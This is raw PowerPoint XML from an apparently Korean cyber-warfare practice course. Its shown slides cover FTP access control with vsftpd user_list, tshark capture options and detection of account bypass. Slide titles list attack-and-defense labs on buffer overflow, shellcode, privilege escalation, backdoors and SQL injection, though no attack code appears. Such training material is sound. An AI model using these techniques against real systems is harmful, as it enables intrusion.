            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> restart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다시 패킷을 캡처하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용자의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접근이 거부됨을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E184BD-4519-40CB-8627-41235BA5CE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1034" t="80601" r="19333" b="2136"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="570593" y="920963"/>
            <a:ext cx="4300093" cy="602107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65847C6A-0C4E-40C3-B79F-B635824B71D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2567818298"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="570593" y="1658568"/>
          <a:ext cx="4932807" cy="980186"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="181491520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tshark </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>옵션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90192671"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6410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-c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캡처할 패킷들의 수</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-w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캡처한 패킷들을 저장할 파일 이름</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 :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캡처된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패킷들이 저장된 파일 이름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779775"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B2D52D7-8B2A-431B-90DB-7A08F5C3228C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1334" t="13784" r="1234" b="4042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="570022" y="3277627"/>
            <a:ext cx="4841422" cy="2572498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EEEF75B-AA02-45F9-9FA8-FEEA8237509C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1" r="-294" b="14213"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6281892" y="855949"/>
            <a:ext cx="5033807" cy="2247613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="표 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53E24A63-6A2A-4567-9AEC-153B392CE67B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90355532"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6281892" y="3212200"/>
          <a:ext cx="4932807" cy="736346"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1277954937"/>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user</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>_list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27777403"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4378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설정에 따라 접속 허용 목록</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(white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또는 접근 거부</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r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(black list)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지정할 수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11958"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC205F13-DB4D-47D5-980E-E30E8003099A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6281892" y="4506414"/>
            <a:ext cx="5005578" cy="564515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C16F562-66DB-47A3-ABB9-C161B92AF74F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5529725"/>
            <a:ext cx="5616792" cy="959274"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6960275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/Training/Unit/Sys/5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>계정 우회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서버에 계정 우회 접속하여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중인 사용자를 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접속 로그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제한 설정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우회 접속을 탐지하고 대응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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1385792030"/>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12270</TotalTime>
  <Words>17183</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>4174</Paragraphs>
  <Slides>191</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>사용한 글꼴</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>17</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>테마</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>슬라이드 제목</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>191</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="209" baseType="lpstr">
      <vt:lpstr>AppleSDGothicNeo</vt:lpstr>
      <vt:lpstr>HelveticaNeue-Regular</vt:lpstr>
      <vt:lpstr>HY중고딕</vt:lpstr>
      <vt:lpstr>Montserrat</vt:lpstr>
      <vt:lpstr>Nanum Gothic</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>Noto Sans KR</vt:lpstr>
      <vt:lpstr>돋움</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>맑은 고딕 Semilight</vt:lpstr>
      <vt:lpstr>바탕</vt:lpstr>
      <vt:lpstr>함초롬바탕</vt:lpstr>
      <vt:lpstr>휴먼명조</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Source Sans Pro</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>한컴바탕</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>사이버전실습</vt:lpstr>
      <vt:lpstr>/  목  차</vt:lpstr>
      <vt:lpstr>/Intro   사이버전? </vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  PPT 구성</vt:lpstr>
      <vt:lpstr>/Intro  비대면 수업</vt:lpstr>
      <vt:lpstr>/Plan  강의안</vt:lpstr>
      <vt:lpstr>/Plan  강의안 - 단위과제</vt:lpstr>
      <vt:lpstr>/Plan/Inforsec  강의안 - 정보보호</vt:lpstr>
      <vt:lpstr>/Plan/Inforsec  강의안 – 정보보호</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Plan/Inforsec  강의안 – Intro</vt:lpstr>
      <vt:lpstr>/Plan/Inforsec  강의안 - 정보보호</vt:lpstr>
      <vt:lpstr>/Plan/Defcybsec  강의안 – 국방 사이버 보안</vt:lpstr>
      <vt:lpstr>/Plan/Defcybsec  강의안 – 국방 사이버 보안</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Plan/Defcybsec  강의안 – 국방 사이버 보안</vt:lpstr>
      <vt:lpstr>/Plan/Circles  문화부 계획 – 정보보호반</vt:lpstr>
      <vt:lpstr>/Environ  환경</vt:lpstr>
      <vt:lpstr>/Environ/Python  Python 설치</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Environ/WindowUpdate  윈도우 10 업데이트</vt:lpstr>
      <vt:lpstr>/Environ/WSL2  WSL2 란?</vt:lpstr>
      <vt:lpstr>/Environ/WSL2  WSL2 설치</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Environ/Docker  Docker 란?</vt:lpstr>
      <vt:lpstr>/Environ/Docker  WSL2 Docker 설치</vt:lpstr>
      <vt:lpstr>/Tool  Tool 사용법</vt:lpstr>
      <vt:lpstr>/Theory  이론</vt:lpstr>
      <vt:lpstr>/Theory/T1   사이버전 실습체계 구조</vt:lpstr>
      <vt:lpstr>/Theory/T1   LMS</vt:lpstr>
      <vt:lpstr>/Theory/T1   LMS</vt:lpstr>
      <vt:lpstr>/Theory/T1   단위과제 기반 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   시나리오 기반 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   공격&amp;방어 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   체계 구성도</vt:lpstr>
      <vt:lpstr>/Theory/T2   리눅스 기본 명령어</vt:lpstr>
      <vt:lpstr>/Theory/T2/1  # pwd : 현재 디렉토리 경로 출력</vt:lpstr>
      <vt:lpstr>/Theory/T2/2  # cd : 경로 이동</vt:lpstr>
      <vt:lpstr>/Theory/T2/3  # ls : 디렉토리 목록 확인</vt:lpstr>
      <vt:lpstr>/Theory/T2/4  # mkdir : 디렉토리 생성</vt:lpstr>
      <vt:lpstr>/Theory/T2/5  # touch : 파일생성 및 날짜정보 변경</vt:lpstr>
      <vt:lpstr>/Theory/T2/6  # cat : 파일생성 및 출력</vt:lpstr>
      <vt:lpstr>/Theory/T2/7  # rm : 파일이나 디렉토리를 삭제</vt:lpstr>
      <vt:lpstr>/Theory/T2/8  # mv : 파일 혹은 디렉토리 이동</vt:lpstr>
      <vt:lpstr>/Theory/T2/9  # cp : 파일 혹은 디렉토리를 복사</vt:lpstr>
      <vt:lpstr>/Theory/T2/10  # man : 리눅스 매뉴얼 출력</vt:lpstr>
      <vt:lpstr>/Theory/T2/11  # head/tail : 보고싶은 줄 수만큼 출력</vt:lpstr>
      <vt:lpstr>/Theory/T2/12  # find : 특정 파일이나 디렉토리를 검색</vt:lpstr>
      <vt:lpstr>/Theory/T3   리눅스 파일 시스템</vt:lpstr>
      <vt:lpstr>/Theory/T3/Def  파일 시스템 이란?</vt:lpstr>
      <vt:lpstr>/Theory/T3/Def  파일 시스템 종류</vt:lpstr>
      <vt:lpstr>/Theory/T3/Def  파일 write() 순서</vt:lpstr>
      <vt:lpstr>/Theory/T3/History   리눅스 파일시스템 역사</vt:lpstr>
      <vt:lpstr>/Theory/T3/FSSTND   리눅스 파일시스템 표준</vt:lpstr>
      <vt:lpstr>/Theory/T3/FSSTND   리눅스 파일시스템 표준</vt:lpstr>
      <vt:lpstr>/Theory/T3/FSSTND   리눅스 파일시스템 표준</vt:lpstr>
      <vt:lpstr>/Theory/T3/Structure   리눅스 파일시스템 구조</vt:lpstr>
      <vt:lpstr>/Theory/T3/Structure   리눅스 파일시스템 구조 – Ext4</vt:lpstr>
      <vt:lpstr>/Theory/T3/Structure   Ext4 – Super Block</vt:lpstr>
      <vt:lpstr>/Theory/T3/TimeStamp   파일 시스템 타임스탬프</vt:lpstr>
      <vt:lpstr>/Theory/T4   고전암호</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar   카이사르 암호</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar   카이사르 암호의 크랙</vt:lpstr>
      <vt:lpstr>/Theory/T4/Substitution  치환 암호</vt:lpstr>
      <vt:lpstr>/Theory/T4/Substitution  치환 암호의 크랙</vt:lpstr>
      <vt:lpstr>/Theory/T4/Substitution  치환 암호의 크랙</vt:lpstr>
      <vt:lpstr>/Theory/T4/Vigenere  비즈네르 암호</vt:lpstr>
      <vt:lpstr>/Theory/T5   현대암호</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현 – 진수</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현 – 진수</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T14   자료의 표현종류</vt:lpstr>
      <vt:lpstr>/Theory/T14   자료의 표현 – ASCII 코드</vt:lpstr>
      <vt:lpstr>/Theory/T14   자료의 표현 – 파일 헤더</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training  실습</vt:lpstr>
      <vt:lpstr>/Training/Unit  단위과제</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys  시스템 문제 리스트</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/0  0. 실습 구성도</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/1  1. 파일 접근 권한 설정</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/2  2. 시스템 로그 점검</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/3  3. R-명령어 제한</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/4  4. 계정 원격 접속 탐지</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/5  5. 계정 우회 접속 탐지</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/6  6. 파일 접근 권한 설정</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/7  7. FTP 서비스 설정</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/8  8. Buffer Overflow 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/8  8. Buffer Overflow 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/9  9. BOF - 쉘코드 실행</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/9  9. BOF - 쉘코드 실행 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/10  10. BOF - 힙</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/10  10. BOF – 힙 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/11  11. Format String 공격 및 방어</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/Training/Unit/Sys/11  11. Format String 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/12  12. 권한상승 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/12  12. 권한상승 공격 및 방어- 대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/13  13. 백도어 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/13  13. 백도어 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/14  14. 비인가 접근 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/14  14. 비인가 접근 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net  네트워크 문제 리스트</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/0  0. 실습 구성도</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/1  1. NIS(+) 서비스 제한</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web  웹 문제 리스트</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web  0. 실습 구성도</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/1  1. SQL Injection 공격/방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Cipher  암호실습</vt:lpstr>
      <vt:lpstr>/Training/Cipher/1 고전암호 크래킹 – 카이사르 암호 1</vt:lpstr>
      <vt:lpstr>/Training/Cipher/1 암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Cipher/2 고전암호 크래킹 – 카이사르 암호 2</vt:lpstr>
      <vt:lpstr>/Training/Cipher/2 암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Cipher/5 고전암호 실습 – 카이사르 암호</vt:lpstr>
      <vt:lpstr>/Training/Cipher/5 암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Cipher/6 고전암호 실습 – 비즈네르 암호</vt:lpstr>
      <vt:lpstr>/Training/Cipher/6 암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Cipher/6 고전암호 실습 – 에니그마 영화</vt:lpstr>
      <vt:lpstr>/Training/Cipher/6 고전암호 실습 – 에니그마 구조</vt:lpstr>
      <vt:lpstr>/Training/Cipher/6 고전암호 실습 – 에니그마 해독</vt:lpstr>
      <vt:lpstr>/Training/Cipher/7  현대암호 실습 – RSA 암호</vt:lpstr>
      <vt:lpstr>/Training/Cipher/7 암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Appendix  부록</vt:lpstr>
      <vt:lpstr>/Appendix  해킹 시연</vt:lpstr>
      <vt:lpstr>/Appendix  해킹 관련 영상</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사이버전실습</dc:title>
  <dc:creator>arizona95</dc:creator>
  <cp:lastModifiedBy>도우</cp:lastModifiedBy>
  <cp:revision>361</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-08T02:39:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-08T16:04:25Z</dcterms:modified>
</cp:coreProperties>
</file>